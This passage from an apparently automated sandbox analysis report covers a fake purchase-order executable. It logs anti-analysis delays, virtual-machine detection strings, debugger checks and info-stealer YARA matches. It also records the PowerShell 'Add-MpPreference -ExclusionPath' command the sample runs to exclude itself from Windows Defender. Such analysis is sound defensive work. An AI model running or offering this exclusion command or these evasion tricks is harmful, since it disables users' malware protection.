                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599868Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599327Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598997Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597358Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597244Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597028Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596046Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595280Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595171Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 594625Jump to behavior
                Source: Amcache.hve.15.drBinary or memory string: VMware
                Source: Amcache.hve.15.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                Source: Amcache.hve.15.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.15.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.15.drBinary or memory string: VMware20,1hbin@
                Source: svchost.exe, 00000005.00000002.2365316585.00000202B3E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0vB
                Source: Amcache.hve.15.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.15.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.15.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: svchost.exe, 00000005.00000002.2366558664.00000202B945A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2366464053.00000202B9420000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1245555922.00000202B9420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.15.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.15.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.15.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.15.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.15.drBinary or memory string: vmci.sys
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1139961156.0000000009179000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.15.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.15.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.15.drBinary or memory string: VMware20,1
                Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.15.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.15.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.15.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.15.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.15.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.15.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.15.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.15.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.15.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A9668 LdrInitializeThunk,4_2_066A9668
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.15.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.15.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.15.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR
                Source: Yara matchFile source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
